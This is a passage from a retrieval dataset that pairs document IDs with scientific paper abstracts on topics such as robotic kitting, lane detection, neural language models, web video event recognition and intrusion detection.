"text": "Individualized manufacturing of cars requires kitting: the collection of individual sets of part variants for each car. This challenging logistic task is frequently performed manually by warehouseman. We propose a mobile manipulation robotic system for autonomous kitting, building on the Kuka Miiwa platform which consists of an omnidirectional base, a 7 DoF collaborative iiwa manipulator, cameras, and distance sensors. Software modules for detection and pose estimation of transport boxes, part segmentation in these containers, recognition of part variants, grasp generation, and arm trajectory optimization have been developed and integrated. Our system is designed for collaborative kitting, i.e. some parts are collected by warehouseman while other parts are picked by the robot. To address safe human-robot collaboration, fast arm trajectory replanning considering previously unforeseen obstacles is realized. The developed system was evaluated in the European Robotics Challenge 2, where the Miiwa robot demonstrated autonomous kitting, part variant recognition, and avoidance of unforeseen obstacles.",
"title": ""
},
{
"docid": "e818b0a38d17a77cc6cfdee2761f12c4",
"text": "In this paper, we present improved lane tracking using vehicle localization. Lane markers are detected using a bank of steerable filters, and lanes are tracked using Kalman filtering. On-road vehicle detection has been achieved using an active learning approach, and vehicles are tracked using a Condensation particle filter. While most state-of-the art lane tracking systems are not capable of performing in high-density traffic scenes, the proposed framework exploits robust vehicle tracking to allow for improved lane tracking in high density traffic. Experimental results demonstrate that lane tracking performance, robustness, and temporal response are significantly improved in the proposed framework, while also tracking vehicles, with minimal additional hardware requirements.",
"title": ""
},
{
"docid": "f6a5f4280a8352157164d6abc1259a45",
"text": "A new robust lane marking detection algorithm for monocular vision is proposed. It is designed for the urban roads with disturbances and with the weak lane markings. The primary contribution of the paper is that it supplies a robust adaptive method of image segmentation, which employs jointly prior knowledge, statistical information and the special geometrical features of lane markings in the bird's-eye view. This method can eliminate many disturbances while keep points of lane markings effectively. Road classification can help us extract more accurate and simple characteristics of lane markings, so the second contribution of the paper is that it uses the row information of image to classify road conditions into three kinds and uses different strategies to complete lane marking detection. The experimental results have shown the high performance of our algorithm in various road scenes.",
"title": ""
},
{
"docid": "dacb4491a0cf1e05a2972cc1a82a6c62",
"text": "Human parechovirus type 3 (HPeV3) can cause serious conditions in neonates, such as sepsis and encephalitis, but data for adults are lacking. The case of a pregnant woman with HPeV3 infection is reported herein. A 28-year-old woman at 36 weeks of pregnancy was admitted because of myalgia and muscle weakness. Her grip strength was 6.0kg for her right hand and 2.5kg for her left hand. The patient's symptoms, probably due to fasciitis and not myositis, improved gradually with conservative treatment, however labor pains with genital bleeding developed unexpectedly 3 days after admission. An obstetric consultation was obtained and a cesarean section was performed, with no complications. A real-time PCR assay for the detection of viral genomic ribonucleic acid against HPeV showed positive results for pharyngeal swabs, feces, and blood, and negative results for the placenta, umbilical cord, umbilical cord blood, amniotic fluid, and breast milk. The HPeV3 was genotyped by sequencing of the VP1 region. The woman made a full recovery and was discharged with her infant in a stable condition.",
"title": ""
},
{
"docid": "fe6fa144846269c7b2c9230ca9d8217b",
"text": "The paper is dedicated to plagiarism problem. The ways how to reduce plagiarism: both: plagiarism prevention and plagiarism detection are discussed. Widely used plagiarism detection methods are described. The most known plagiarism detection tools are analysed.",
"title": ""
},
{
"docid": "39351cdf91466aa12576d9eb475fb558",
"text": "Fault tolerance is a remarkable feature of biological systems and their self-repair capability influence modern electronic systems. In this paper, we propose a novel plastic neural network model, which establishes homeostasis in a spiking neural network. Combined with this plasticity and the inspiration from inhibitory interneurons, we develop a fault-resilient robotic controller implemented on an FPGA establishing obstacle avoidance task. We demonstrate the proposed methodology on a spiking neural network implemented on Xilinx Artix-7 FPGA. The system is able to maintain stable firing (tolerance ±10%) with a loss of up to 75% of the original synaptic inputs to a neuron. Our repair mechanism has minimal hardware overhead with a tuning circuit (repair unit) which consumes only three slices/neuron for implementing a threshold voltage-based homeostatic fault-tolerant unit. The overall architecture has a minimal impact on power consumption and, therefore, supports scalable implementations. This paper opens a novel way of implementing the behavior of natural fault tolerant system in hardware establishing homeostatic self-repair behavior.",
"title": ""
},
{
"docid": "7a47dde6f7cc68c092922718000a807a",
"text": "In the present study k-Nearest Neighbor classification method, have been studied for economic forecasting. Due to the effects of companies’ financial distress on stakeholders, financial distress prediction models have been one of the most attractive areas in financial research. In recent years, after the global financial crisis, the number of bankrupt companies has risen. Since companies' financial distress is the first stage of bankruptcy, using financial ratios for predicting financial distress have attracted too much attention of the academics as well as economic and financial institutions. Although in recent years studies on predicting companies’ financial distress in Iran have been increased, most efforts have exploited traditional statistical methods; and just a few studies have used nonparametric methods. Recent studies demonstrate this method is more capable than other methods.",
"title": ""
},
{
"docid": "99b485dd4290c463b35867b98b51146c",
"text": "The term rhombencephalitis refers to inflammatory diseases affecting the hindbrain (brainstem and cerebellum). Rhombencephalitis has a wide variety of etiologies, including infections, autoimmune diseases, and paraneoplastic syndromes. Infection with bacteria of the genus Listeria is the most common cause of rhombencephalitis. Primary rhombencephalitis caused by infection with Listeria spp. occurs in healthy young adults. It usually has a biphasic time course with a flu-like syndrome, followed by brainstem dysfunction; 75% of patients have cerebrospinal fluid pleocytosis, and nearly 100% have an abnormal brain magnetic resonance imaging scan. However, other possible causes of rhombencephalitis must be borne in mind. In addition to the clinical aspects, the patterns seen in magnetic resonance imaging can be helpful in defining the possible cause. Some of the reported causes of rhombencephalitis are potentially severe and life threatening; therefore, an accurate initial diagnostic approach is important to establishing a proper early treatment regimen. This pictorial essay reviews the various causes of rhombencephalitis and the corresponding magnetic resonance imaging findings, by describing illustrative confirmed cases.",
"title": ""
},
{
"docid": "dc096631d6412e06f305f83b2c8734bc",
"text": "Many important search tasks require multiple search sessions to complete. Tasks such as travel planning, large purchases, or job searches can span hours, days, or even weeks. Inevitably, life interferes, requiring the searcher either to recover the \"state\" of the search manually (most common), or plan for interruption in advance (unlikely). The goal of this work is to better understand, characterize, and automatically detect search tasks that will be continued in the near future. To this end, we analyze a query log from the Bing Web search engine to identify the types of intents, topics, and search behavior patterns associated with long-running tasks that are likely to be continued. Using our insights, we develop an effective prediction algorithm that significantly outperforms both the previous state-of-the-art method, and even the ability of human judges, to predict future task continuation. Potential applications of our techniques would allow a search engine to pre-emptively \"save state\" for a searcher (e.g., by caching search results), perform more targeted personalization, and otherwise better support the searcher experience for interrupted search tasks.",
"title": ""
},
{
"docid": "22ad9bc66f0a9274fcf76697152bab4d",
"text": "We consider the recovery of a (real- or complex-valued) signal from magnitude-only measurements, known as phase retrieval. We formulate phase retrieval as a convex optimization problem, which we call PhaseMax. Unlike other convex methods that use semidefinite relaxation and lift the phase retrieval problem to a higher dimension, PhaseMax is a “non-lifting” relaxation that operates in the original signal dimension. We show that the dual problem to PhaseMax is basis pursuit, which implies that the phase retrieval can be performed using algorithms initially designed for sparse signal recovery. We develop sharp lower bounds on the success probability of PhaseMax for a broad range of random measurement ensembles, and we analyze the impact of measurement noise on the solution accuracy. We use numerical results to demonstrate the accuracy of our recovery guarantees, and we showcase the efficacy and limits of PhaseMax in practice.",
"title": ""
},
{
"docid": "d31ff1d528902c72727a8a3946089b9e",
"text": "Small Manufacturing Entities (SMEs) have not incorporated robotic automation as readily as large companies due to rapidly changing product lines, complex and dexterous tasks, and the high cost of start-up. While recent low-cost robots such as the Universal Robots UR5 and Rethink Robotics Baxter are more economical and feature improved programming interfaces, based on our discussions with manufacturers further incorporation of robots into the manufacturing work flow is limited by the ability of these systems to generalize across tasks and handle environmental variation. Our goal is to create a system designed for small manufacturers that contains a set of capabilities useful for a wide range of tasks, is both powerful and easy to use, allows for perceptually grounded actions, and is able to accumulate, abstract, and reuse plans that have been taught. We present an extension to Behavior Trees that allows for representing the system capabilities of a robot as a set of generalizable operations that are exposed to an end-user for creating task plans. We implement this framework in CoSTAR, the Collaborative System for Task Automation and Recognition, and demonstrate its effectiveness with two case studies. We first perform a complex tool-based object manipulation task in a laboratory setting. We then show the deployment of our system in an SME where we automate a machine tending task that was not possible with current off the shelf robots.",
"title": ""
},
{
"docid": "1b421293cc38eec47c94754cd5e244ff",
"text": "We study the problem of hypothesis testing between two discrete distributions, where we only have access to samples after the action of a known reversible Markov chain, playing the role of noise. We derive instance-dependent minimax rates for the sample complexity of this problem, and show how its dependence in time is related to the spectral properties of the Markov chain. We show that there exists a wide statistical window, in terms of sample complexity for hypothesis testing between different pairs of initial distributions. We illustrate these results in several concrete examples.",
"title": ""
}
] | scidocsrr |
a5e284358add46d05c289c0061080cb7 | A Neural Attention Model for Sentence Summarization | [
{
"docid": "062c970a14ac0715ccf96cee464a4fec",
"text": "A goal of statistical language modeling is to learn the joint probability function of sequences of words in a language. This is intrinsically difficult because of the curse of dimensionality: a word sequence on which the model will be tested is likely to be different from all the word sequences seen during training. Traditional but very successful approaches based on n-grams obtain generalization by concatenating very short overlapping sequences seen in the training set. We propose to fight the curse of dimensionality by learning a distributed representation for words which allows each training sentence to inform the model about an exponential number of semantically neighboring sentences. The model learns simultaneously (1) a distributed representation for each word along with (2) the probability function for word sequences, expressed in terms of these representations. Generalization is obtained because a sequence of words that has never been seen before gets high probability if it is made of words that are similar (in the sense of having a nearby representation) to words forming an already seen sentence. Training such large models (with millions of parameters) within a reasonable time is itself a significant challenge. We report on experiments using neural networks for the probability function, showing on two text corpora that the proposed approach significantly improves on state-of-the-art n-gram models, and that the proposed approach allows to take advantage of longer contexts.",
"title": ""
}
] | [
{
"docid": "1f6b1757282fda5bae06cd0617054642",
"text": "A crucial step toward the goal of automatic extraction of propositionalinformationfrom naturallanguagetext is the identificationof semanticrelations betweenconstituentsin sentences.We examinethe problemof distinguishing amongsevenrelationtypesthatcanoccurbetweentheentities“treatment”and “disease” in biosciencetext, and the problemof identifyingsuchentities.We comparefive generati ve graphicalmodels anda neuralnetwork, usinglexical, syntactic,andsemanticfeatures,finding that thelatterhelpachieve high classificationaccuracy.",
"title": ""
},
{
"docid": "abc75d5b44323133d2b1ffef57a920f3",
"text": "With the increasing adoption of mobile 4G LTE networks, video streaming as the major contributor of 4G LTE data traffic, has become extremely hot. However, the battery life has become the bottleneck when mobile users are using online video services. In this paper, we deploy a real mobile system for power measurement and profiling of online video streaming in 4G LTE networks. Based on some designed experiments with different configurations, we measure the power consumption for online video streaming, offline video playing, and mobile background. A RRC state study is taken to understand how RRC states impact power consumption. Then, we profile the power consumption of video streaming and show the results with different impact factors. According to our experimental statistics, the power saving room for online video streaming in 4G LTE networks can be up to 69%.",
"title": ""
},
{
"docid": "028cdddc5d61865d0ea288180cef91c0",
"text": "This paper investigates the use of Convolutional Neural Networks for classification of painted symbolic road markings. Previous work on road marking recognition is mostly based on either template matching or on classical feature extraction followed by classifier training which is not always effective and based on feature engineering. However, with the rise of deep neural networks and their success in ADAS systems, it is natural to investigate the suitability of CNN for road marking recognition. Unlike others, our focus is solely on road marking recognition and not detection; which has been extensively explored and conventionally based on MSER feature extraction of the IPM images. We train five different CNN architectures with variable number of convolution/max-pooling and fully connected layers, and different resolution of road mark patches. We use a publicly available road marking data set and incorporate data augmentation to enhance the size of this data set which is required for training deep nets. The augmented data set is randomly partitioned in 70% and 30% for training and testing. The best CNN network results in an average recognition rate of 99.05% for 10 classes of road markings on the test set.",
"title": ""
},
{
"docid": "1d2de6042cb07b0b29d3e1f99483fa5c",
"text": "The incorporation of prior knowledge into learning is essential in achieving good performance based on small noisy samples. Such knowledge is often incorporated through the availability of related data arising from domains and tasks similar to the one of current interest. Ideally one would like to allow both the data for the current task and for previous related tasks to self-organize the learning system in such a way that commonalities and differences between the tasks are learned in a datadriven fashion. We develop a framework for learning multiple tasks simultaneously, based on sharing features that are common to all tasks, achieved through the use of a modular deep feedforward neural network consisting of shared branches, dealing with the common features of all tasks, and private branches, learning the specific unique aspects of each task. Once an appropriate weight sharing architecture has been established, learning takes place through standard algorithms for feedforward networks, e.g., stochastic gradient descent and its variations. The method deals with domain adaptation and multi-task learning in a unified fashion, and can easily deal with data arising from different types of sources. Numerical experiments demonstrate the effectiveness of learning in domain adaptation and transfer learning setups, and provide evidence for the flexible and task-oriented representations arising in the network.",
"title": ""
},
{
"docid": "78c8331beb0d09570c4063fab7d21f2d",
"text": "This paper presents a new single stage dc-dc boost converter topology with very large gain conversion ratio as a switched inductor multilevel boost converter (SIMLBC). It is a PWM-based dc-dc converter which combines the Switched-Inductor Structures and the switching capacitor function to provide a very large output voltage with different output dc levels which makes it suitable for multilevel inverter applications. The proposed topology has only single switch like the conventional dc-dc converter which can be controlled in a very simple way. In addition to, two inductors, 2N+2 diodes, N is the number of output dc voltage levels, and 2N-1 dc capacitors. A high switching frequency is employed to decrease the size of these components and thus much increasing the dynamic performance. The proposed topology has been compared with the existence dc-dc boost converters and it gives a higher voltage gain conversion ratio. The proposed converter has been analyzed, simulated and a prototype has been built and experimentally tested. Simulation and experimental results have been provided for validation.",
"title": ""
},
{
"docid": "853b3fc8a979abd7e13a87b5c3b4a264",
"text": "In this paper, we present a novel control law for longitudinal speed control of autonomous vehicles. The key contributions of the proposed work include the design of a control law that reactively integrates the longitudinal surface gradient of road into its operation. In contrast to the existing works, we found that integrating the path gradient into the control framework improves the speed tracking efficacy. Since the control law is implemented over a shrinking domain scheme, it minimizes the integrated error by recomputing the control inputs at every discretized step and consequently provides less reaction time. This makes our control law suitable for motion planning frameworks that are operating at high frequencies. Furthermore, our work is implemented using a generalized vehicle model and can be easily extended to other classes of vehicles. The performance of gradient aware shrinking domain based controller is implemented and tested on a stock electric vehicle on which a number of sensors are mounted. Results from the tests show the robustness of our control law for speed tracking on a terrain with varying gradient while also considering stringent time constraints imposed by the planning framework.",
"title": ""
},
{
"docid": "937cb60b2eea0611e9c2b55dcbd85457",
"text": "In the era of big data, with the increasing number of audit data features, human-centered smart intrusion detection system performance is decreasing in training time and classification accuracy, and many support vector machine (SVM)-based intrusion detection algorithms have been widely used to identify an intrusion quickly and accurately. This paper proposes the FWP-SVM-genetic algorithm (GA) (feature selection, weight, and parameter optimization of support vector machine based on the genetic algorithm) based on the characteristics of the GA and the SVM algorithm. The algorithm first optimizes the crossover probability and mutation probability of GA according to the population evolution algebra and fitness value; then, it subsequently uses a feature selection method based on the genetic algorithm with an innovation in the fitness function that decreases the SVM error rate and increases the true positive rate. Finally, according to the optimal feature subset, the feature weights and parameters of SVM are simultaneously optimized. The simulation results show that the algorithm accelerates the algorithm convergence, increases the true positive rate, decreases the error rate, and shortens the classification time. Compared with other SVM-based intrusion detection algorithms, the detection rate is higher and the false positive and false negative rates are lower.",
"title": ""
},
{
"docid": "78e21364224b9aa95f86ac31e38916ef",
"text": "Gamification is the use of game design elements and game mechanics in non-game contexts. This idea has been used successfully in many web based businesses to increase user engagement. Some researchers suggest that it could also be used in web based education as a tool to increase student motivation and engagement. In an attempt to verify those theories, we have designed and built a gamification plugin for a well-known e-learning platform. We have made an experiment using this plugin in a university course, collecting quantitative and qualitative data in the process. Our findings suggest that some common beliefs about the benefits obtained when using games in education can be challenged. Students who completed the gamified experience got better scores in practical assignments and in overall score, but our findings also suggest that these students performed poorly on written assignments and participated less on class activities, although their initial motivation was higher. 2013 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "90e218a8ae79dc1d53e53d4eb63839b8",
"text": "Doubly fed induction generator (DFIG) technology is the dominant technology in the growing global market for wind power generation, due to the combination of variable-speed operation and a cost-effective partially rated power converter. However, the DFIG is sensitive to dips in supply voltage and without specific protection to “ride-through” grid faults, a DFIG risks damage to its power converter due to overcurrent and/or overvoltage. Conventional converter protection via a sustained period of rotor-crowbar closed circuit leads to poor power output and sustained suppression of the stator voltages. A new minimum-threshold rotor-crowbar method is presented in this paper, improving fault response by reducing crowbar application periods to 11-16 ms, successfully diverting transient overcurrents, and restoring good power control within 45 ms of both fault initiation and clearance, thus enabling the DFIG to meet grid-code fault-ride-through requirements. The new method is experimentally verified and evaluated using a 7.5-kW test facility.",
"title": ""
},
{
"docid": "aaececc42ba6d87ec018788fa73bc792",
"text": "This review set out to address three apparently simple questions: What makes 'great teaching'? What kinds of frameworks or tools could help us to capture it? How could this promote better learning? Question 1: \" What makes great teaching? \" Great teaching is defined as that which leads to improved student progress We define effective teaching as that which leads to improved student achievement using outcomes that matter to their future success. Defining effective teaching is not easy. The research keeps coming back to this critical point: student progress is the yardstick by which teacher quality should be assessed. Ultimately, for a judgement about whether teaching is effective, to be seen as trustworthy, it must be checked against the progress being made by students. The six components of great teaching Schools currently use a number of frameworks that describe the core elements of effective teaching. The problem is that these attributes are so broadly defined that they can be open to wide and different interpretation whether high quality teaching has been observed in the classroom. It is important to understand these limitations when making assessments about teaching quality. Below we list the six common components suggested by research that teachers should consider when assessing teaching quality. We list these approaches, skills and knowledge in order of how strong the evidence is in showing that focusing on them can improve student outcomes. This should be seen as offering a 'starter kit' for thinking about effective pedagogy. Good quality teaching will likely involve a combination of these attributes manifested at different times; the very best teachers are those that demonstrate all of these features. The most effective teachers have deep knowledge of the subjects they teach, and when teachers' knowledge falls below a certain level it is a significant impediment to students' learning. As well as a strong understanding of the material being taught, teachers must also understand the ways students think about the content, be able to evaluate the thinking behind students' own methods, and identify students' common misconceptions. Includes elements such as effective questioning and use of assessment by teachers. Specific practices, like reviewing previous learning, providing model responses for students, giving adequate time for practice to embed skills securely Executive Summary 3 and progressively introducing new learning (scaffolding) are also elements of high quality instruction. 3. Classroom climate (Moderate evidence of impact on student outcomes) Covers …",
"title": ""
},
{
"docid": "3c8cc4192ee6ddd126e53c8ab242f396",
"text": "There are several approaches for automated functional web testing and the choice among them depends on a number of factors, including the tools used for web testing and the costs associated with their adoption. In this paper, we present an empirical cost/benefit analysis of two different categories of automated functional web testing approaches: (1) capture-replay web testing (in particular, using Selenium IDE); and, (2) programmable web testing (using Selenium WebDriver). On a set of six web applications, we evaluated the costs of applying these testing approaches both when developing the initial test suites from scratch and when the test suites are maintained, upon the release of a new software version. Results indicate that, on the one hand, the development of the test suites is more expensive in terms of time required (between 32% and 112%) when the programmable web testing approach is adopted, but on the other hand, test suite maintenance is less expensive when this approach is used (with a saving between 16% and 51%). We found that, in the majority of the cases, after a small number of releases (from one to three), the cumulative cost of programmable web testing becomes lower than the cost involved with capture-replay web testing and the cost saving gets amplified over the successive releases.",
"title": ""
},
{
"docid": "0c3387ec7ed161d931bc08151e722d10",
"text": "New updated! The latest book from a very famous author finally comes out. Book of the tower of hanoi myths and maths, as an amazing reference becomes what you need to get. What's for is this book? Are you still thinking for what the book is? Well, this is what you probably will get. You should have made proper choices for your better life. Book, as a source that may involve the facts, opinion, literature, religion, and many others are the great friends to join with.",
"title": ""
},
{
"docid": "55f118976784a7244859e0256c4660e3",
"text": "The developments of content based image retrieval (CBIR) systems used for image archiving are continued and one of the important research topics. Although some studies have been presented general image achieving, proposed CBIR systems for archiving of medical images are not very efficient. In presented study, it is examined the retrieval efficiency rate of spatial methods used for feature extraction for medical image retrieval systems. The investigated algorithms in this study depend on gray level co-occurrence matrix (GLCM), gray level run length matrix (GLRLM), and Gabor wavelet accepted as spatial methods. In the experiments, the database is built including hundreds of medical images such as brain, lung, sinus, and bone. The results obtained in this study shows that queries based on statistics obtained from GLCM are satisfied. However, it is observed that Gabor Wavelet has been the most effective and accurate method.",
"title": ""
},
{
"docid": "fd3297e53076595bdffccabe78e17a46",
"text": "The UrBan Interactions (UBI) research program, coordinated by the University of Oulu, has created a middleware layer on top of the panOULU wireless network and opened it up to ubiquitous-computing researchers, offering opportunities to enhance and facilitate communication between citizens and the government.",
"title": ""
},
{
"docid": "6020b70701164e0a14b435153db1743e",
"text": "Supply chain Management has assumed a significant role in firm's performance and has attracted serious research attention over the last few years. In this paper attempt has been made to review the literature on Supply Chain Management. A literature review reveals a considerable spurt in research in theory and practice of SCM. We have presented a literature review for 29 research papers for the period between 2005 and 2011. The aim of this study was to provide an up-to-date and brief review of the SCM literature that was focused on broad areas of the SCM concept.",
"title": ""
},
{
"docid": "4076b5d1338a7552453e284019406129",
"text": "Knowledge bases (KBs) are paramount in NLP. We employ multiview learning for increasing accuracy and coverage of entity type information in KBs. We rely on two metaviews: language and representation. For language, we consider high-resource and lowresource languages from Wikipedia. For representation, we consider representations based on the context distribution of the entity (i.e., on its embedding), on the entity’s name (i.e., on its surface form) and on its description in Wikipedia. The two metaviews language and representation can be freely combined: each pair of language and representation (e.g., German embedding, English description, Spanish name) is a distinct view. Our experiments on entity typing with fine-grained classes demonstrate the effectiveness of multiview learning. We release MVET, a large multiview – and, in particular, multilingual – entity typing dataset we created. Monoand multilingual finegrained entity typing systems can be evaluated on this dataset.",
"title": ""
},
{
"docid": "0a0e33e03036ef025eb8450bedaf0c1f",
"text": "Recently there has been considerable interest in EEG-based emotion recognition (EEG-ER), which is one of the utilization of BCI. However, it is not easy to realize the EEG-ER system which can recognize emotions with high accuracy because of the tendency for important information in EEG signals to be concealed by noises. Deep learning is the golden tool to grasp the features concealed in EEG data and enable highly accurate EEG-ER because deep neural networks (DNNs) may have higher recognition capability than humans'. The publicly available dataset named DEAP, which is for emotion analysis using EEG, was used in the experiment. The CNN and a conventional model used for comparison are evaluated by the tests according to 11-fold cross validation scheme. EEG raw data obtained from 16 electrodes without general preprocesses were used as input data. The models classify and recognize EEG signals according to the emotional states \"positive\" or \"negative\" which were caused by watching music videos. The results show that the more training data are, the much higher the accuracies of CNNs are (by over 20%). It also suggests that the increased training data need not to belong to the same person's EEG data as the test data so as to get the CNN recognizing emotions accurately. The results indicate that there are not only the considerable amount of the interpersonal difference but also commonality of EEG properties.",
"title": ""
},
{
"docid": "49568236b0e221053c32b73b896d3dde",
"text": "The continuous growth in the size and use of the Internet is creating difficulties in the search for information. A sophisticated method to organize the layout of the information and assist user navigation is therefore particularly important. In this paper, we evaluate the feasibility of using a self-organizing map (SOM) to mine web log data and provide a visual tool to assist user navigation. We have developed LOGSOM, a system that utilizes Kohonen’s self-organizing map to organize web pages into a two-dimensional map. The organization of the web pages is based solely on the users’ navigation behavior, rather than the content of the web pages. The resulting map not only provides a meaningful navigation tool (for web users) that is easily incorporated with web browsers, but also serves as a visual analysis tool for webmasters to better understand the characteristics and navigation behaviors of web users visiting their pages. D 2002 Elsevier Science B.V. All rights reserved.",
"title": ""
},
{
"docid": "f001d0801b892b9a85bd8cf4870f1007",
"text": "Several supervised approaches have been proposed for causality identification by relying on shallow linguistic features. However, such features do not lead to improved performance. Therefore, novel sources of knowledge are required to achieve progress on this problem. In this paper, we propose a model for the recognition of causality in verb-noun pairs by employing additional types of knowledge along with linguistic features. In particular, we focus on identifying and employing semantic classes of nouns and verbs with high tendency to encode cause or non-cause relations. Our model incorporates the information about these classes to minimize errors in predictions made by a basic supervised classifier relying merely on shallow linguistic features. As compared with this basic classifier our model achieves 14.74% (29.57%) improvement in F-score (accuracy), respectively.",
"title": ""
},
{
"docid": "bdd44aeacddeefdfc2e3a5abf1088f2c",
"text": "Elevation data is an important component of geospatial database. This paper focuses on digital surface model (DSM) generation from high-resolution satellite imagery (HRSI). The HRSI systems, such as IKONOS and QuickBird have initialed a new era of Earth observation and digital mapping. The half-meter or better resolution imagery from Worldview-1 and the planned GeoEye-1 allows for accurate and reliable extraction and characterization of even more details of the earth surface. In this paper, the DSM is generated using an advanced image matching approach which integrates point and edge matching algorithms. This approach produces reliable, precise, and very dense 3D points for high quality digital surface models which also preserve discontinuities. Following the DSM generation, the accuracy of the DSM has been assessed and reported. To serve both as a reference surface and a basis for comparison, a lidar DSM has been employed in a testfield with differing terrain types and slope.",
"title": ""
}
] | scidocsrr |
b5ebf4bb779afe0b26086033e9b4cb89 | Exploiting web images for event recognition in consumer videos: A multiple source domain adaptation approach | [
{
"docid": "df163d94fbf0414af1dde4a9e7fe7624",
"text": "This paper introduces a web image dataset created by NUS's Lab for Media Search. The dataset includes: (1) 269,648 images and the associated tags from Flickr, with a total of 5,018 unique tags; (2) six types of low-level features extracted from these images, including 64-D color histogram, 144-D color correlogram, 73-D edge direction histogram, 128-D wavelet texture, 225-D block-wise color moments extracted over 5x5 fixed grid partitions, and 500-D bag of words based on SIFT descriptions; and (3) ground-truth for 81 concepts that can be used for evaluation. Based on this dataset, we highlight characteristics of Web image collections and identify four research issues on web image annotation and retrieval. We also provide the baseline results for web image annotation by learning from the tags using the traditional k-NN algorithm. The benchmark results indicate that it is possible to learn effective models from sufficiently large image dataset to facilitate general image retrieval.",
"title": ""
},
{
"docid": "f78fcf875104f8bab2fa465c414331c6",
"text": "In this paper, we present a systematic framework for recognizing realistic actions from videos “in the wild”. Such unconstrained videos are abundant in personal collections as well as on the Web. Recognizing action from such videos has not been addressed extensively, primarily due to the tremendous variations that result from camera motion, background clutter, changes in object appearance, and scale, etc. The main challenge is how to extract reliable and informative features from the unconstrained videos. We extract both motion and static features from the videos. Since the raw features of both types are dense yet noisy, we propose strategies to prune these features. We use motion statistics to acquire stable motion features and clean static features. Furthermore, PageRank is used to mine the most informative static features. In order to further construct compact yet discriminative visual vocabularies, a divisive information-theoretic algorithm is employed to group semantically related features. Finally, AdaBoost is chosen to integrate all the heterogeneous yet complementary features for recognition. We have tested the framework on the KTH dataset and our own dataset consisting of 11 categories of actions collected from YouTube and personal videos, and have obtained impressive results for action recognition and action localization.",
"title": ""
},
{
"docid": "6148a8847c01d46931250b959087b1b1",
"text": "Recognizing visual content in unconstrained videos has become a very important problem for many applications. Existing corpora for video analysis lack scale and/or content diversity, and thus limited the needed progress in this critical area. In this paper, we describe and release a new database called CCV, containing 9,317 web videos over 20 semantic categories, including events like \"baseball\" and \"parade\", scenes like \"beach\", and objects like \"cat\". The database was collected with extra care to ensure relevance to consumer interest and originality of video content without post-editing. Such videos typically have very little textual annotation and thus can benefit from the development of automatic content analysis techniques.\n We used Amazon MTurk platform to perform manual annotation, and studied the behaviors and performance of human annotators on MTurk. We also compared the abilities in understanding consumer video content by humans and machines. For the latter, we implemented automatic classifiers using state-of-the-art multi-modal approach that achieved top performance in recent TRECVID multimedia event detection task. Results confirmed classifiers fusing audio and video features significantly outperform single-modality solutions. We also found that humans are much better at understanding categories of nonrigid objects such as \"cat\", while current automatic techniques are relatively close to humans in recognizing categories that have distinctive background scenes or audio patterns.",
"title": ""
}
] | [
{
"docid": "b6508d1f2b73b90a0cfe6399f6b44421",
"text": "An alternative to land spreading of manure effluents is to mass-culture algae on the N and P present in the manure and convert manure N and P into algal biomass. The objective of this study was to determine how the fatty acid (FA) content and composition of algae respond to changes in the type of manure, manure loading rate, and to whether the algae was grown with supplemental carbon dioxide. Algal biomass was harvested weekly from indoor laboratory-scale algal turf scrubber (ATS) units using different loading rates of raw and anaerobically digested dairy manure effluents and raw swine manure effluent. Manure loading rates corresponded to N loading rates of 0.2 to 1.3 g TN m−2 day−1 for raw swine manure effluent and 0.3 to 2.3 g TN m−2 day−1 for dairy manure effluents. In addition, algal biomass was harvested from outdoor pilot-scale ATS units using different loading rates of raw and anaerobically digested dairy manure effluents. Both indoor and outdoor units were dominated by Rhizoclonium sp. FA content values of the algal biomass ranged from 0.6 to 1.5% of dry weight and showed no consistent relationship to loading rate, type of manure, or to whether supplemental carbon dioxide was added to the systems. FA composition was remarkably consistent among samples and >90% of the FA content consisted of 14:0, 16:0, 16:1ω7, 16:1ω9, 18:0, 18:1ω9, 18:2 ω6, and 18:3ω3.",
"title": ""
},
{
"docid": "74c39dfd176da58b264acfd7c2260821",
"text": "This non-experimental, causal study related to examine and explore the relationships among electronic service quality, customer satisfaction, electronics recovery service quality, and customer loyalty for consumer electronics e-tailers. This study adopted quota and snowball sampling. A total of 121 participants completed the online survey. Out of seven hypotheses in this study, five were supported, whereas two were not supported. Findings indicated that electronic recovery service quality had positive effect on customer loyalty. However, findings indicated that electronic recovery service quality had no effect on perceived value and customer satisfaction. Findings also indicated that perceived value and customer satisfaction were two significant variables that mediated the relationships between electronic service quality and customer loyalty. Moreover, this study found that electronic service quality had no direct effect on customer satisfaction, but had indirect positive effects on customer satisfaction for consumer electronics e-tailers. In terms of practical implications, consumer electronics e-tailers' managers could formulate a competitive strategy based on the modified Electronic Customer Relationship Re-Establishment model to retain current customers and to enhance customer relationship management (CRM). The limitations and recommendations for future research were also included in this study.",
"title": ""
},
{
"docid": "01e064e0f2267de5a26765f945114a6e",
"text": "In this paper, we make contact with the field of nonparametric statistics and present a development and generalization of tools and results for use in image processing and reconstruction. In particular, we adapt and expand kernel regression ideas for use in image denoising, upscaling, interpolation, fusion, and more. Furthermore, we establish key relationships with some popular existing methods and show how several of these algorithms, including the recently popularized bilateral filter, are special cases of the proposed framework. The resulting algorithms and analyses are amply illustrated with practical examples",
"title": ""
},
{
"docid": "fa7ec2419ffc22b1ee43694b5f4e21b9",
"text": "We consider the problem of finding outliers in large multivariate databases. Outlier detection can be applied during the data cleansing process of data mining to identify problems with the data itself, and to fraud detection where groups of outliers are often of particular interest. We use replicator neural networks (RNNs) to provide a measure of the outlyingness of data records. The performance of the RNNs is assessed using a ranked score measure. The effectiveness of the RNNs for outlier detection is demonstrated on two publicly available databases.",
"title": ""
},
{
"docid": "06b81ec29ee26f13720891eea9f902df",
"text": "This paper reports the design of a Waveguide-Fed Cavity Backed Slot Antenna Array in Ku-band. The antenna is made entire via simple milling process. The overall antenna structure consists of 3 layers. The bottom layer is a waveguide feed network to provide corporate power division. In turn, the waveguide feed network is fed by a conventional SMA connector from the back. The waveguide network couples energy to an array of cavity via an aperture. This constitutes the middle layer. Each cavity then excites an array of 2×2 radiating slots in the top layer. The radiating slot elements and the feed network are designed to achieve wide bandwidth and gain performance. Finally, an 8×8 array antenna is designed with about 25dBi gain and bandwidth of 1.6GHz in the Ku-band.",
"title": ""
},
{
"docid": "a15e9c4cf715be331a3cb388b8c7eda1",
